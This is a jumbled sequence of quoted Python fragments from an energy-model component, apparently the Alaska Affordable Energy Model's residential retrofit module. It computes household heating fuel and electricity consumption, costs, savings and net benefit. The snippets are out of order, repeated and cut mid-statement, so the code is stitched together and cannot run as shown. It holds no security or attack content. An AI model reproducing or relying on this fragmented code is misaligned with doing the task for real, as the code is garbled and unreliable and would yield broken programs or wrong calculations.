Heat (kWh/year) Cost Savings\": s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption Baseline\": b_LP,", ": dictionary component specific data for a community. Initial value: 'Residential Buildings' section", "- self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption = \\ self.baseline_fuel_kWh_consumption -", "Consumption Savings\": s_bio, \"Residential: Heating Biomass (cords/year) Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass", "forecast self.refit_cost_rate = \\ self.comp_specs['average refit cost'] * \\ community_data.get_item( 'community', 'regional construction", "Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\":", "0: self.proposed_fuel_gas_consumption = 0 # coal,solar, other def calc_proposed_kWh_consumption (self): \"\"\"calculate the proposed", "< con_threshold) or np.isnan(avg_con): avg_con = con_threshold self.diagnostics.add_note(self.component_name, (\"Average residential Electric consumption\" \"", "module, see information on CommunityData Object aaem.forecast : forecast module, see information on", ": np.array baseline natural gas consumption baseline_fuel_LP_consumption : np.array baseline propane consumption baseline_fuel_kWh_consumption", "other def calc_baseline_kWh_cost (self): \"\"\"calculate baseline electricity costs Attributes ---------- baseline_kWh_cost : np.array", "= self.cd['file id'].split('+') if len(tag) > 1 and tag[1] != 'residential': self.was_run =", "* LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost - r_LP_cost b_NG", "\\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_LP) amnt = np.float64(rd[\"Electricity\"]) / 100.0 self.savings_kWh = avg_EUI_reduction", "= np.float64(rd[\"Electricity\"]) / 100.0 percent_accounted += amnt self.init_kWh = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_kWh)", "Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential: Heating", "r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price r_NG_cost = self.proposed_fuel_gas_consumption * gas_price s_NG_cost =", "Gas (Mcf/year) Cost Savings\": s_NG_cost, \"Residential: Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net", "Total Cost Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(), }, years) try:", "total energy produced \"\"\" # no electric return self.baseline_HF_consumption[:self.actual_project_life] - \\ self.proposed_HF_consumption[:self.actual_project_life] def", "Consumption Baseline\", \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\", \"Residential: Heating Oil (gallons/year)", "= self.forecast.get_population(self.start_year, self.end_year).astype(int) df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] +", "r_bio_cost b_elec = self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh r_elec = self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec b_elec_cost", "= HF_price wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane", "(self): \"\"\"Calculate the baseline kWh consumption for a community Attributes ---------- baseline_kWh_consumption :", "\\ self.baseline_fuel_LP_consumption - self.savings_LP self.proposed_fuel_gas_consumption = \\ self.baseline_fuel_gas_consumption - self.savings_gas self.proposed_fuel_kWh_consumption = \\", "Parameters ---------- directory : path output directory \"\"\" if not self.was_run: return if", "All (MMBtu/year) Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\":", "no prerequisites leave empty Attributes ---------- diagnostics : diagnostics for tracking error/warning messages", "np.float64(rd[\"LP\"]) / 100.0 percent_accounted += amnt self.init_LP = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_LP) amnt", "r_NG_cost years = np.array(range(self.project_life)) + self.start_year df = DataFrame({ \"Residential: Heating Fuel All", "(kWh/year) Consumption Savings\": s_elec, \"Residential: Electric Heat (kWh/year) Cost Baseline\": b_elec_cost, \"Residential: Electric", "b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost", "Cost Savings\", \"Residential: Total Cost Savings ($/year)\", \"Residential: Net Benefit ($/year)\" ]] df[\"community\"]", "self.get_diesel_prices() self.calc_baseline_fuel_cost() self.calc_proposed_fuel_cost() self.calc_baseline_kWh_cost() self.calc_proposed_kWh_cost() self.calc_annual_electric_savings() self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit()", "component of the Alaska Affordable Energy Model: This module estimates the potential improvements", "\"Residential: Heating Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential: Heating Oil (gallons/year) Cost Post", "\"\"\"Calculate baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating fuel consumption baseline_fuel_wood_consumption", "Heating Oil (gallons/year) Consumption Baseline\", \"Residential: Heating Oil (gallons/year) Consumption Post Retrofit\", \"Residential:", "electric consumption per yer \"\"\" HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH", "Heating Oil (gallons/year) Cost Post Retrofit\", \"Residential: Heating Oil (gallons/year) Cost Savings\", \"Residential:", "average monthly consumption of electricity for a house. Attributes ---------- avg_kWh_consumption_per_HH : float", "* HF_price r_oil_cost = self.proposed_fuel_Hoil_consumption * HF_price s_oil_cost = b_oil_cost - r_oil_cost b_bio", "+\\ self.savings_gas * (1/constants.mmbtu_to_Mcf) +\\ self.savings_kWh * (1/constants.mmbtu_to_kWh) +\\ self.savings_LP* (1/constants.mmbtu_to_gal_LP) def calc_consumption_by_fuel", "self.proposed_fuel_kWh_consumption * gas_price def calc_proposed_kWh_cost (self): \"\"\"Calculate post retrofit electricity costs Attributes ----------", "have not been retrofit as of 2010, the performance improvements as a percentage", "+ \\ rd[\"Pre-Retrofit Avg Area (SF)\"] * \\ rd[\"Pre-Retrofit Avg EUI (MMBtu/sf)\"] *", "Cost Baseline\": b_NG_cost, \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\": r_NG_cost, \"Residential:", "consumption for residential buildings HH : float a # of houses cf: float", "LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost - r_LP_cost b_NG =", "self.proposed_fuel_LP_consumption/constants.mmbtu_to_gal_LP s_LP = b_LP - r_LP b_LP_cost = self.baseline_fuel_LP_consumption * LP_price r_LP_cost =", "Cost Post Retrofit\": self.get_proposed_HF_cost(), \"Residential: Heating Fuel All (MMBtu/year) Cost Savings\": self.get_heating_savings_costs(), \"Residential:", "Heating Biomass (cords/year) Consumption Savings\": s_bio, \"Residential: Heating Biomass (cords/year) Cost Baseline\": b_bio_cost,", "= HH * self.avg_kWh_consumption_per_HH * \\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption - HH_consumption)", "base line heating fuel costs Attributes ---------- baseline_HF_cost : np.array baseline cost of", "proposed_kWh_cost: np.array proposed electricity cost \"\"\" kWh_cost = self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost =", "Biomass (cords/year) Cost Savings\", \"Residential: Electric Heat (kWh/year) Cost Baseline\", \"Residential: Electric Heat", "area * EUI self.baseline_fuel_Hoil_consumption = \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption =", "(self): \"\"\"Calculate proposed heating cost Attributes ---------- proposed_HF_cost : np.array proposed heating fuel", "import os from aaem.components.annual_savings import AnnualSavings from aaem.community_data import CommunityData from aaem.forecast import", "self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 self.savings_wood", "years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP) self.forecast.add_heat_demand_column(\\", "Cost Savings ($/year)\", \"Residential: Net Benefit ($/year)\" ]] df[\"community\"] = self.cd['name'] df[\"population\"] =", "= self.cd['propane price'] gas_price = self.cd['natural gas price'] self.proposed_HF_cost = \\ self.proposed_fuel_Hoil_consumption *", "\\ self.proposed_fuel_gas_consumption * gas_price + \\ self.proposed_fuel_LP_consumption * LP_price + \\ self.proposed_fuel_kWh_consumption *", "b_LP, \"Residential: Heating Propane (gallons/year) Consumption Post Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year)", "Electric Heat (kWh/year) Consumption Post Retrofit\", \"Residential: Electric Heat (kWh/year) Consumption Savings\", \"Residential:", "component has no prerequisites leave empty Attributes ---------- diagnostics : diagnostics for tracking", "Recovery project for this component to run. Parameters ---------- scalers : dictionary of", "self.cd['natural gas price'] else: HF_price = np.nan wood_price = np.nan elec_price = np.nan", "Heat (kWh/year) Consumption Post Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year) Consumption Savings\": s_elec,", "self.savings_other self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas *", "Consumption Post Retrofit\": r_elec, \"Residential: Electric Heat (kWh/year) Consumption Savings\": s_elec, \"Residential: Electric", "+= amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0", "\"Residential: Heating Biomass (cords/year) Cost Baseline\": b_bio_cost, \"Residential: Heating Biomass (cords/year) Cost Post", "There must be a known Heat Recovery project for this component to run.", "and the forecasted price of offset heating fuels. The cost to retrofit each", "default value self.calc_avg_consumption() if self.cd[\"model electricity\"]: self.calc_baseline_kWh_consumption() self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~", "self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self): \"\"\"calculate base line heating", "self.calc_annual_heating_savings() self.calc_annual_total_savings() self.calc_annual_costs(self.cd['interest rate'], scalers['capital costs']) self.calc_annual_net_benefit() self.calc_npv(self.cd['discount rate'], self.cd['current year']) self.calc_levelized_costs(0) def", "in each of these function calls is an identity amnt = np.float64(rd[\"Fuel Oil\"])", "(self): \"\"\"Calculate the proposed heating fuel consumption Attributes ---------- proposed_fuel_Hoil_consumption : np.array proposed", ": float total cost of improvements ($) \"\"\" self.capital_costs = self.opportunity_HH * self.refit_cost_rate", "float savings in natural gas fuel consumption savings_LP : float savings in propane", "---------- annual_heating_savings : np.array heating savings ($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\", "+\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the", "/ pop))) def calc_init_consumption (self): \"\"\"Calculate the initial consumption for each fuel type.", "float total savings in mmbtu \"\"\" rd = self.comp_specs['data'] ## #HH self.opportunity_HH =", "= diagnostics() self.intertie_data = community_data.intertie_data self.cd = community_data.get_section('community') #~ self.copied_elec = community_data.copies.\\ #~", "Cost Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\": r_LP_cost, \"Residential: Heating", ": forecast module, see information on Forecast Object aaem.diagnostics : diagnostics module, see", "first year of the project Attributes ---------- init_HH : int estimated households for", "pre-retrofit consumption, and the forecasted price of offset heating fuels. The cost to", "self.percent_savings = rd[\"opportunity_total_percent_community_savings\"] #~ self.percent_savings = np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area", "* constants.mmbtu_to_Mcf self.baseline_fuel_LP_consumption = \\ self.init_LP+np.float64(rd[\"LP\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_LP self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\", "Savings ($/year)\": self.get_total_savings_costs(), \"Residential: Net Benefit ($/year)\": self.get_net_benefit(), }, years) try: df =", "consumption total = rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES Total Consumption (MMBtu)\"] +", "as of 2010, the performance improvements as a percentage of the pre-retrofit consumption,", "Heating Propane (gallons/year) Cost Post Retrofit\", \"Residential: Heating Propane (gallons/year) Cost Savings\", \"Residential:", "b_LP_cost - r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG -", "fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price =", "* gas_price + \\ self.baseline_fuel_LP_consumption * LP_price + \\ self.baseline_fuel_kWh_consumption * gas_price #", "See note on accepted scalers Attributes ---------- run : bool True in the", "Oil (gallons/year) Consumption Savings\": s_oil, \"Residential: Heating Oil (gallons/year) Cost Baseline\": b_oil_cost, \"Residential:", "-\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\": self.get_base_HF_cost(), \"Residential: Heating Fuel", ") self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house", "True in the component runs to completion, False otherwise reason : string lists", "self.cd[\"electric prices\"].\\ ix[self.start_year:self.end_year] kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh self.proposed_kWh_cost = self.proposed_kWh_consumption * kWh_cost", "\\ community_data.get_item( 'community', 'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr", "natural gas consumption baseline_fuel_LP_consumption : np.array baseline propane consumption baseline_fuel_kWh_consumption : np.array baseline", "(1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh consumption for a community Attributes", "(MMBtu/sf)\"]) avg_EUI_reduction = np.float64(rd[\"Post-Retrofit Avg. EUI Reduction\"]) total = area * EUI #", "project.\" return # needed for electric or HF component and has a default", "r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price r_elec_cost = self.proposed_fuel_kWh_consumption * elec_price s_elec_cost =", "kWh_cost def calc_capital_costs (self): \"\"\"Calculate the capital costs. Attributes ---------- capital_costs : float", "Propane (gallons/year) Cost Baseline\": b_LP_cost, \"Residential: Heating Propane (gallons/year) Cost Post Retrofit\": r_LP_cost,", "premium']) wood_price = self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane", "yer \"\"\" HH = self.households self.baseline_kWh_consumption = self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self):", "Heat (kWh/year) Consumption Savings\", \"Residential: Heating Propane (gallons/year) Consumption Baseline\", \"Residential: Heating Propane", "self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self): \"\"\"Calculate the baseline kWh consumption for a", "section of community_data See also -------- aaem.community_data : community data module, see information", "=self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val / self.base_pop))) def run (self, scalers = {'capital", "Gas (Mcf/year) Cost Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\", \"Residential:", "np.array proposed natural gas consumption proposed_fuel_kWh_consumption : np.array proposed electric consumption proposed_HF_consumption :", "Post Retrofit\", \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\", \"Residential: Heating Oil (gallons/year)", ": community data module, see information on CommunityData Object aaem.forecast : forecast module,", "- post_heat) * constants.mmbtu_to_gal_HF def get_total_energy_produced (self): \"\"\"Get total energy produced. Returns -------", "= self.proposed_fuel_kWh_consumption * elec_price s_elec_cost = b_elec_cost - r_elec_cost b_LP = self.baseline_fuel_LP_consumption/constants.mmbtu_to_gal_LP r_LP", "Post Retrofit\": r_LP, \"Residential: Heating Propane (gallons/year) Consumption Savings\": s_LP, \"Residential: Heating Propane", "Heat (kWh/year) Consumption Post Retrofit\", \"Residential: Electric Heat (kWh/year) Consumption Savings\", \"Residential: Heating", "house']) if not self.intertie_data is None: avg_con = self.intertie_data.get_item( 'Residential Energy Efficiency', 'data'", "self.diagnostics.add_note(self.component_name, \"calculate Houses to retrofit was negative, setting to 0\" ) ## %", "consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\ \" in \" + str(yr)) def calc_init_HH", "\"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year)", "100.0 HH = self.households #~ print HH area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"])", "be a known Heat Recovery project for this component to run. Parameters ----------", "Consumption Post Retrofit\": self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\", "r_LP, \"Residential: Heating Propane (gallons/year) Consumption Savings\": s_LP, \"Residential: Heating Propane (gallons/year) Cost", "'data' )['average kWh per house'] #~ self.avg_monthly_consumption = ave_con/12 if (avg_con < con_threshold)", "first year of project \"\"\" val = self.forecast.get_population(self.start_year) HH = self.comp_specs['data']['Total Occupied'] pop", "self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [kWh/year]\", years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed", "dictionary of valid scalers, optional Scalers to adjust normal run variables. See note", "+ '_' +\\ self.component_name.lower() + \"_output.csv\") fname = fname.replace(\" \",\"_\") # save to", "Consumption Baseline\": b_bio, \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\": r_bio, \"Residential: Heating", "\"\"\"calculate annual electric savings created by the project Attributes ---------- annual_electric_savings : np.array", "\"Residential: Heating Oil (gallons/year) Consumption Baseline\": b_oil, \"Residential: Heating Oil (gallons/year) Consumption Post", "Heating Oil (gallons/year) Cost Baseline\", \"Residential: Heating Oil (gallons/year) Cost Post Retrofit\", \"Residential:", "self.diagnostics.add_note(self.component_name, \"Average consumption was \" + str(self.avg_kWh_consumption_per_HH) +\\ \" in \" + str(yr))", "s_elec_cost, \"Residential: Heating Propane (gallons/year) Consumption Baseline\": b_LP, \"Residential: Heating Propane (gallons/year) Consumption", "np.array baseline heating fuel consumption baseline_fuel_wood_consumption : np.array baseline cordwood consumption baseline_fuel_gas_consumption :", "of community_data comp_specs : dictionary component specific data for a community. Initial value:", "produced. Returns ------- float the total energy produced \"\"\" # no electric return", "self.was_run = False self.reason = \"Not a residential project.\" return # needed for", "self.cd['cordwood price'] elec_price = self.cd[\"electric prices\"]\\ .ix[self.start_year:self.end_year].T.values[0] LP_price = self.cd['propane price'] gas_price =", "Cost Savings\": s_oil_cost, \"Residential: Heating Biomass (cords/year) Consumption Baseline\": b_bio, \"Residential: Heating Biomass", "self.proposed_fuel_Hoil_consumption/constants.mmbtu_to_gal_HF s_oil = b_oil - r_oil b_oil_cost = self.baseline_fuel_Hoil_consumption * HF_price r_oil_cost =", "years, self.baseline_fuel_kWh_consumption) self.forecast.add_heating_fuel_column(\\ \"electric_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_kWh_consumption/constants.mmbtu_to_kWh) self.forecast.add_heating_fuel_column(\\ \"propane_residential_consumed [gallons/year]\", years, self.baseline_fuel_LP_consumption) self.forecast.add_heating_fuel_column(\\", "\"\"\"Calculate the baseline kWh consumption for a community Attributes ---------- baseline_kWh_consumption : np.array", "baseline heating fuel consumption baseline_fuel_wood_consumption : np.array baseline cordwood consumption baseline_fuel_gas_consumption : np.array", "proposed natural gas consumption proposed_fuel_kWh_consumption : np.array proposed electric consumption proposed_HF_consumption : np.array", "= \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler * constants.mmbtu_to_cords self.baseline_fuel_gas_consumption = self.init_gas + \\ np.float64(rd[\"Utility Gas\"]/100.0)", "import CommunityData from aaem.forecast import Forecast from aaem.diagnostics import Diagnostics import aaem.constants as", "Baseline\": b_elec, \"Residential: Electric Heat (kWh/year) Consumption Post Retrofit\": r_elec, \"Residential: Electric Heat", "self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1, constants.mmbtu_to_Mcf) amnt = np.float64(rd[\"LP\"]) / 100.0 self.savings_LP", "proposed_fuel_gas_consumption : np.array proposed natural gas consumption proposed_fuel_kWh_consumption : np.array proposed electric consumption", "years, self.baseline_fuel_wood_consumption) self.forecast.add_heating_fuel_column(\\ \"cords_wood_residential_consumed [mmbtu/year]\", years, self.baseline_fuel_wood_consumption/constants.mmbtu_to_cords) self.forecast.add_heating_fuel_column(\\ \"gas_residential_consumed [Mcf/year]\", years, self.baseline_fuel_gas_consumption) self.forecast.add_heating_fuel_column(\\", "self.forecast.get_population(self.start_year) HH =self.comp_specs['data']['Total Occupied'] self.init_HH = int(round(HH*(val / self.base_pop))) def run (self, scalers", "b_NG, \"Residential: Heating Natural Gas (Mcf/year) Consumption Post Retrofit\": r_NG, \"Residential: Heating Natural", "total, HH, constants.mmbtu_to_gal_HF) amnt = np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt self.init_wood =", "= self.baseline_fuel_LP_consumption * LP_price r_LP_cost = self.proposed_fuel_LP_consumption * LP_price s_LP_cost = b_LP_cost -", "'community', 'regional construction multiplier' ) self.set_project_life_details( self.comp_specs[\"start year\"], self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year'])", "\\ constants.kWh_to_mmbtu return np.float64(fuel_amnt * (total_consumption - HH_consumption) * cf) def calc_baseline_fuel_consumption (self):", "df = df[df.columns[-2:].tolist() + df.columns[:-2].tolist()] fname = os.path.join(directory, self.cd['name'] + '_' +\\ self.component_name.lower()", "* \\ (1/constants.mmbtu_to_gal_HF) +\\ self.baseline_fuel_wood_consumption * \\ (1/constants.mmbtu_to_cords) +\\ self.baseline_fuel_gas_consumption * (1/constants.mmbtu_to_Mcf) +\\", "kWh consumption for a community Attributes ---------- proposed_kWh_consumption : np.array set to baseline", "\"\"\" base_heat = \\ self.baseline_HF_consumption[:self.actual_project_life] post_heat = \\ self.proposed_HF_consumption[:self.actual_project_life] return (base_heat - post_heat)", ": np.array heating savings ($/year) \"\"\" self.annual_heating_savings = self.baseline_HF_cost - \\ self.proposed_HF_cost def", "= self.avg_kWh_consumption_per_HH * HH def calc_baseline_fuel_cost (self): \"\"\"calculate base line heating fuel costs", "the forecast to values calculated in this component \"\"\" years = range(self.start_year,self.end_year) self.forecast.add_heating_fuel_column(\\", "self.comp_specs[\"lifetime\"] ) yr = int(self.comp_specs['data']['Year']) self.base_pop = int(self.forecast.population.ix[yr])#.values[0][0] peps_per_house = float(self.base_pop) / \\", "np.array proposed electric consumption proposed_HF_consumption : np.array proposed total electric consumption \"\"\" self.proposed_fuel_Hoil_consumption", "= \\ self.init_HF+np.float64(rd[\"Fuel Oil\"]/100.0)*\\ scaler * constants.mmbtu_to_gal_HF self.baseline_fuel_wood_consumption = \\ self.init_wood+np.float64(rd[\"Wood\"]/100.0)*\\ scaler *", "str(self.avg_kWh_consumption_per_HH) +\\ \" in \" + str(yr)) def calc_init_HH (self): \"\"\"Estimate the #", ": dictionary of valid scalers, optional Scalers to adjust normal run variables. See", ": float savings in natural gas fuel consumption savings_LP : float savings in", "self.opportunity_HH = np.float64( self.opportunity_HH ) #~ print self.opportunity_HH if self.opportunity_HH < 0: self.opportunity_HH", "self.savings_mmbtu = self.savings_HF * (1/constants.mmbtu_to_gal_HF) +\\ self.savings_wood * (1/constants.mmbtu_to_cords) +\\ self.savings_gas * (1/constants.mmbtu_to_Mcf)", "np.array baseline electricity consumption baseline_HF_consumption : np.array baseline total heating fuel consumption \"\"\"", "fuel premium']) wood_price = self.cd['cordwood price'] elec_price = self.elec_prices[self.start_year-self.start_year: self.end_year-self.start_year] LP_price = self.cd['propane", "fuel consumption savings_LP : float savings in propane consumption savings_kWh : float savings", "= b_NG_cost - r_NG_cost years = np.array(range(self.project_life)) + self.start_year df = DataFrame({ \"Residential:", "Cost Baseline\", \"Residential: Heating Natural Gas (Mcf/year) Cost Post Retrofit\", \"Residential: Heating Natural", "self.percent_savings = np.float64( self.percent_savings) area = np.float64(rd[\"Pre-Retrofit Avg Area (SF)\"]) EUI = np.float64(rd[\"Pre-Retrofit", "Gas (Mcf/year) Cost Post Retrofit\", \"Residential: Heating Natural Gas (Mcf/year) Cost Savings\", \"Residential:", "(MMBtu/year) Consumption Savings\": self.get_base_HF_use() -\\ self.get_proposed_HF_use(), \"Residential: Heating Fuel All (MMBtu/year) Cost Baseline\":", "Consumption Baseline\", \"Residential: Heating Biomass (cords/year) Consumption Post Retrofit\", \"Residential: Heating Biomass (cords/year)", "community_data, forecast, diag = None, prerequisites = {}): \"\"\"Class initialiser Parameters ---------- community_data", "propane consumption init_kWh : float initial electric consumption \"\"\" rd = self.comp_specs['data'] ##", "\"Residential: Heating Fuel All (MMBtu/year) Consumption Baseline\", \"Residential: Heating Fuel All (MMBtu/year) Consumption", "Oil\"]) / 100.0 self.savings_HF = avg_EUI_reduction * self.opportunity_HH * \\ self.calc_consumption_by_fuel(amnt, total, 1,", "known Heat Recovery project for this component to run. Parameters ---------- scalers :", "savings in heating oil consumption savings_wood : float savings in heating cordwood consumption", "prices\"].index.astype(int) #~ kWh_cost = kWh_cost.T.values[0] # kWh/yr*$/kWh #~ print len(self.baseline_kWh_consumption) kWh_cost = self.cd[\"electric", "\"\"\"Calculate the capital costs. Attributes ---------- capital_costs : float total cost of improvements", "HF_price = (self.diesel_prices + self.cd['heating fuel premium']) self.hoil_price = HF_price wood_price = self.cd['cordwood", "\" in \" + str(yr)) def calc_init_HH (self): \"\"\"Estimate the # of households", "heating cordwood consumption savings_gas : float savings in natural gas fuel consumption savings_LP", "Biomass (cords/year) Consumption Savings\": s_bio, \"Residential: Heating Biomass (cords/year) Cost Baseline\": b_bio_cost, \"Residential:", ": float initial heating cordwood consumption init_gas : float initial natural gas fuel", "Savings\", \"Residential: Electric Heat (kWh/year) Consumption Baseline\", \"Residential: Electric Heat (kWh/year) Consumption Post", "np.float64(rd[\"Wood\"]) / 100.0 percent_accounted += amnt self.init_wood = self.calc_consumption_by_fuel(amnt, total, HH, constants.mmbtu_to_cords) amnt", "information on CommunityData Object aaem.forecast : forecast module, see information on Forecast Object", "\"Residential: Heating Oil (gallons/year) Cost Savings\", \"Residential: Heating Biomass (cords/year) Cost Baseline\", \"Residential:", "self.calc_proposed_kWh_consumption() if self.cd[\"model heating fuel\"]: #~ self.calc_init_HH() self.calc_savings_opportunities() self.calc_init_consumption() self.calc_baseline_fuel_consumption() self.calc_proposed_fuel_consumption() #~ self.set_forecast_columns()", "cordwood consumption init_gas : float initial natural gas fuel consumption init_LP : float", "def calc_annual_electric_savings (self): \"\"\"calculate annual electric savings created by the project Attributes ----------", "r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG = b_NG - r_NG b_NG_cost = self.baseline_fuel_gas_consumption * gas_price", "calc_baseline_fuel_consumption (self): \"\"\"Calculate baseline fuel consumption Attributes: baseline_fuel_Hoil_consumption : np.array baseline heating fuel", "calc_annual_heating_savings (self): \"\"\"calculate annual heating savings created by the project Attributes ---------- annual_heating_savings", "self.init_HH -rd[\"BEES Number\"] -rd[\"Post-Retrofit Number\"] self.opportunity_HH = np.float64( self.opportunity_HH ) #~ print self.opportunity_HH", "= self.comp_specs['data']['Total Occupied'] pop = self.forecast.base_pop self.init_HH = int(round(HH*(val / pop))) def calc_init_consumption", "self.baseline_fuel_kWh_consumption = self.init_kWh+\\ np.float64(rd[\"Electricity\"]/100.0)*\\ scaler * constants.mmbtu_to_kWh #~ self.baseline_fuel_coal_consumption #~ self.baseline_fuel_solar_consumption #~ self.baseline_fuel_other_consumption", "community data module, see information on CommunityData Object aaem.forecast : forecast module, see", "savings in natural gas fuel consumption savings_LP : float savings in propane consumption", "Gas (Mcf/year) Consumption Savings\": s_NG, \"Residential: Heating Natural Gas (Mcf/year) Cost Baseline\": b_NG_cost,", "self.proposed_fuel_kWh_consumption/constants.mmbtu_to_kWh s_elec = b_elec - r_elec b_elec_cost = self.baseline_fuel_kWh_consumption * elec_price r_elec_cost =", "LP_price s_LP_cost = b_LP_cost - r_LP_cost b_NG = self.baseline_fuel_gas_consumption/constants.mmbtu_to_Mcf r_NG = self.proposed_fuel_gas_consumption/constants.mmbtu_to_Mcf s_NG", "values initial value: forecast cd : dictionary general data for a community. Initial", "np.array baseline cost of heating fuels per year \"\"\" HF_price = (self.diesel_prices +", "* (1/constants.mmbtu_to_Mcf) +\\ self.baseline_fuel_kWh_consumption * (1/constants.mmbtu_to_kWh) +\\ self.baseline_fuel_LP_consumption * (1/constants.mmbtu_to_gal_LP) def calc_baseline_kWh_consumption (self):", "total = rd[\"Total Consumption (MMBtu)\"] + \\ rd[\"BEES Total Consumption (MMBtu)\"] + \\", "/ 100.0 percent_accounted += amnt self.init_HF = self.calc_consumption_by_fuel(amnt, total, HH, 